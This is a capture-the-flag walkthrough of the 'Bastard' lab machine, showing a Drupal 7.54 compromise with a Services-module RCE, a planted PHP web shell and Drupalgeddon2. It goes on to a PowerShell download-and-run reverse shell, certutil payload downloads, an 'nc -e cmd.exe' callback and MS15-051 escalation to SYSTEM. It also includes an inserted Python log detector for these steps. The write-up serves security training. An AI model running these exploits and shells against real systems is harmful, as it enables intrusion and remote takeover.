Bastard

Reconnaissance:

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sC -sV -O 10.10.10.9

80/tcp    open  http    Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-title: Welcome to Bastard | Bastard

135/tcp   open  msrpc   Microsoft Windows RPC

49154/tcp open  msrpc   Microsoft Windows RPC

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sU -O 10.10.10.9

All 1000 scanned ports on 10.10.10.9 are in ignored states.

We have three open ports.

  • Port 80: running Drupal 7

  • Port 135 & 49154: running Microsoft Windows RPC

I can also see that the website is running IIS 7.5, which is the default IIS version for Windows 7 / Server 2008 R2. I'll also note that the web server is hosting Drupal 7.

Enumeration: Drupal TCP 80

Visit the web application in the browser.

http://10.10.10.9/

It's running Drupal, which is a free and open-source content management framework. Let's look at the CHANGELOG to find the exact version.

http://10.10.10.9/CHANGELOG.txt
Drupal 7.54, 2017-02-01

Let’s try and find credentials to this application. I googled “default credentials drupal”, but I didn’t find anything useful. Next, I tried common credentials admin/admin, admin/password, etc. but was not able to log in.

When the target is off-the-shelf software, I usually don't run a brute-force attack against it because it probably has a lockout policy in place.

Searchsploit:

Next, run searchsploit.

┌──(kali㉿kali)-[~]
└─$ searchsploit drupal 7

Let's look at exploit 41564.

┌──(kali㉿kali)-[~]
└─$ searchsploit -m 41564
  Exploit: Drupal 7.x Module Services - Remote Code Execution
      URL: https://www.exploit-db.com/exploits/41564
     Path: /usr/share/exploitdb/exploits/php/webapps/41564.php
    Codes: N/A
 Verified: True
File Type: C++ source, ASCII text
Copied to: /home/kali/41564.php

It links to the write-up at https://www.ambionics.io/blog/drupal-services-module-rce. It is a deserialization vulnerability in the Services module that leads to Remote Code Execution (RCE). Looking at the code, we see that it uses the path /rest_endpoint as the Services endpoint when conducting the exploit.

$url = 'http://vmweb.lan/drupal-7.54';
$endpoint_path = '/rest_endpoint';
$endpoint = 'rest_endpoint';

That path is not found on the box; however, if we simply change it to /rest, it works!

http://10.10.10.9/rest

So it is using the Services module. We’ll use this exploit to gain an initial foothold on the box.

Foothold:

Make the following changes to the exploit code.

$url = 'http://10.10.10.9';
$endpoint_path = '/rest';
$endpoint = 'rest_endpoint';

$file = [
    'filename' => 'shell.php',
    'data' => '<?php system($_REQUEST["cmd"]); ?>'
];

Run the exploit.

┌──(kali㉿kali)-[~/Desktop]
└─$ php 41564.php 
# Exploit Title: Drupal 7.x Services Module Remote Code Execution
# Vendor Homepage: https://www.drupal.org/project/services
# Exploit Author: Charles FOL
# Contact: https://twitter.com/ambionics
# Website: https://www.ambionics.io/blog/drupal-services-module-rce

#!/usr/bin/php
Stored session information in session.json
Stored user information in user.json
Cache contains 7 entries
File written: 10.10.10.9/shell.php

Perfect! It created two files: session.json and user.json. View the content of user.json.

┌──(kali㉿kali)-[~/Desktop]
└─$ cat user.json 

"pass": "$S$DRYKUR0xDeqClnV5W0dnncafeE.Wi4YytNcBmmCtwOjrcH5FJSaE"

I can identify that hash as Drupal 7, and try to break it:

hashcat -m 7900 $S$DRYKUR0xDeqClnV5W0dnncafeE.Wi4YytNcBmmCtwOjrcH5FJSaE /usr/share/wordlists/rockyou.txt --force

However, that was going to take about three days on my system, and I don’t really need the password at this point.

It gives us the hashed password of the admin user. We could run it through a password cracker; however, we don't need to, because the session.json file gives us a valid session cookie for the admin user.

┌──(kali㉿kali)-[~/Desktop]
└─$ cat session.json
{
    "session_name": "SESSd873f26fc11f2b7e6e4aa0f6fce59913",
    "session_id": "FVOXx3tasjzJLhRuUq_k33sXCbkWyfx7-9TuHjMEWI0",
    "token": "3eJjQU7S1jUPgVIwYOeyR26UvQntmh9XPXN_B13VB4U"
}

We can now run commands through the web shell that was written to the webroot:

http://10.10.10.9/shell.php?cmd=dir
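From the defender's side, both steps of this foothold leave traces in the IIS access log: a POST to the Services endpoint, then requests to a PHP file that is not one of Drupal's own entry points and that carries a command parameter. The following is an added example, not code from the post or from Drupal: a small W3C-format log parser with two detections over a constructed log excerpt. The endpoint path /rest and the cmd parameter come from the post; the timestamps, the extra parameter aliases, and the list of Drupal 7 root-level PHP entry points are my assumptions.

```python
from urllib.parse import parse_qs

# Constructed IIS W3C log excerpt (not taken from the box). The Services
# endpoint path and the shell.php?cmd= request mirror what the post shows.
SAMPLE_IIS_LOG = """#Software: Microsoft Internet Information Services 7.5
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port c-ip sc-status
2024-01-01 10:00:01 10.10.10.9 GET / - 80 10.10.14.2 200
2024-01-01 10:00:02 10.10.10.9 GET /CHANGELOG.txt - 80 10.10.14.2 200
2024-01-01 10:00:05 10.10.10.9 POST /rest/user/login - 80 10.10.14.2 200
2024-01-01 10:00:09 10.10.10.9 GET /shell.php cmd=dir 80 10.10.14.2 200
2024-01-01 10:00:20 10.10.10.9 GET /index.php q=node/1 80 192.0.2.10 200
"""

SERVICES_ENDPOINT = "/rest"            # endpoint path used in this post
SHELL_PARAMS = {"cmd", "c", "exec"}    # "cmd" is from the post; the rest are assumed aliases
# Assumed allowlist of PHP files that legitimately sit in a Drupal 7 webroot.
DRUPAL_ENTRY_POINTS = {"/index.php", "/cron.php", "/install.php", "/update.php",
                       "/xmlrpc.php", "/authorize.php"}


def parse_iis_log(text):
    """Turn a W3C extended log into dicts keyed by the names in the #Fields line."""
    fields, rows = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.startswith("#") or not line.strip():
            continue              # other directives and blank lines
        elif fields:
            rows.append(dict(zip(fields, line.split())))
    return rows


def find_suspicious(rows):
    """Return (reason, row) pairs for Services-endpoint POSTs and stray PHP files."""
    hits = []
    for r in rows:
        stem, query = r.get("cs-uri-stem", ""), r.get("cs-uri-query", "-")
        params = set(parse_qs(query)) if query != "-" else set()   # IIS logs "-" for no query
        if r.get("cs-method") == "POST" and stem.startswith(SERVICES_ENDPOINT + "/"):
            hits.append(("services-endpoint-post", r))
        if stem.lower().endswith(".php") and stem not in DRUPAL_ENTRY_POINTS:
            reason = "webshell-param" if params & SHELL_PARAMS else "unexpected-php"
            hits.append((reason, r))
    return hits


if __name__ == "__main__":
    for reason, row in find_suspicious(parse_iis_log(SAMPLE_IIS_LOG)):
        print(reason, row["c-ip"], row["cs-method"], row["cs-uri-stem"], row["cs-uri-query"])
```

A PHP file appearing in the webroot that is not on the allowlist is worth a look even without a command parameter, which is why the example reports it separately as unexpected-php.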

Exploit: Ruby Script

On reading about Drupalgeddon2, it seems this is testing the vulnerability on a Drupal 8 specific path.

I’ll try the ruby script, searchsploit -m exploits/php/webapps/44449.rb. Now I’ll run it, and it returns the help, and a warning:

┌──(kali㉿kali)-[~/Desktop]
└─$ searchsploit -m exploits/php/webapps/44449.rb
  Exploit: Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution
      URL: https://www.exploit-db.com/exploits/44449
     Path: /usr/share/exploitdb/exploits/php/webapps/44449.rb
    Codes: CVE-2018-7600
 Verified: True
File Type: Ruby script, ASCII text
Copied to: /home/kali/Desktop/44449.rb

┌──(kali㉿kali)-[~/Desktop]
└─$ ruby 44449.rb 
Usage: ruby drupalggedon2.rb <target> [--authentication] [--verbose]
Example for target that does not require authentication:
       ruby drupalgeddon2.rb https://example.com
Example for target that does require authentication:
       ruby drupalgeddon2.rb https://example.com --authentication

I’ll fix the warning about \r with dos2unix:

┌──(kali㉿kali)-[~/Desktop]
└─$ dos2unix 44449.rb
dos2unix: converting file 44449.rb to Unix format...

┌──(kali㉿kali)-[~/Desktop]
└─$ ruby 44449.rb http://10.10.10.9/

drupalgeddon2>> whoami
nt authority\iusr

drupalgeddon2>> cd \dimitris
drupalgeddon2>> dir

Shell: Nishang

I can upgrade this to a Nishang shell by grabbing a copy of Invoke-PowerShellTcp.ps1, adding a call to the function to the end, Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.14 -Port 443, and then serving that directory with python3 -m http.server 80. I’ll also open a nc listener on port 443.

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.2 -Port 443
┌──(kali㉿kali)-[~/Desktop]
└─$ python3 -m http.server 80

┌──(kali㉿kali)-[~]
└─$ nc -lnvp 443

Then I give this command to the Drupalgeddon2 shell:

drupalgeddon2>> powershell iex(new-object net.webclient).downloadstring('http://10.10.14.2/shell.ps1')

My python webserver gets the request for shell.ps1 and sends it. When shell.ps1 is run, it loads all the functions and then invokes the reverse shell back to me on port 443, which I get in nc:

PS C:\inetpub\drupal-7.54>whoami
nt authority\iusr

Privesc: MS15-051

We run "whoami /priv" to check the privileges of our user and see that we have "SeImpersonatePrivilege". We already know this one from other machines we have solved: with it, we can impersonate the user "nt authority\system".

PS C:\inetpub\drupal-7.54> whoami /priv
PS C:\inetpub\drupal-7.54> systeminfo

As we can see, we are on a Windows Server 2008 R2 box, for which several kernel-level exploits exist that we could also use.

I’ll grab it from here:

┌──(kali㉿kali)-[~/Desktop]
└─$ python3 -m http.server 80

PS C:\inetpub\drupal-7.54> certutil -urlcache -split -f http://10.10.14.2/nc64.exe
PS C:\inetpub\drupal-7.54> certutil -urlcache -split -f http://10.10.14.2/ms15-051x64.exe
PS C:\inetpub\drupal-7.54> dir
PS C:\inetpub\drupal-7.54> .\nc64.exe -e cmd.exe 10.10.14.2 443

┌──(kali㉿kali)-[~]
└─$ rlwrap nc -lvnp 443
C:\inetpub\drupal-7.54>.\ms15-051x64.exe "whoami"
.\ms15-051x64.exe "whoami"
[#] ms15-051 fixed by zcgonvh
[!] process with pid: 2532 created.
==============================
nt authority\system

C:\inetpub\drupal-7.54>whoami
whoami
nt authority\iusr

C:\inetpub\drupal-7.54>.\ms15-051x64.exe ".\nc64.exe -e cmd.exe 10.10.14.2 443"
┌──(kali㉿kali)-[~]
└─$ rlwrap nc -lvnp 443

C:\inetpub\drupal-7.54>whoami
whoami
nt authority\system

C:\Users\Administrator\Desktop>type root.txt
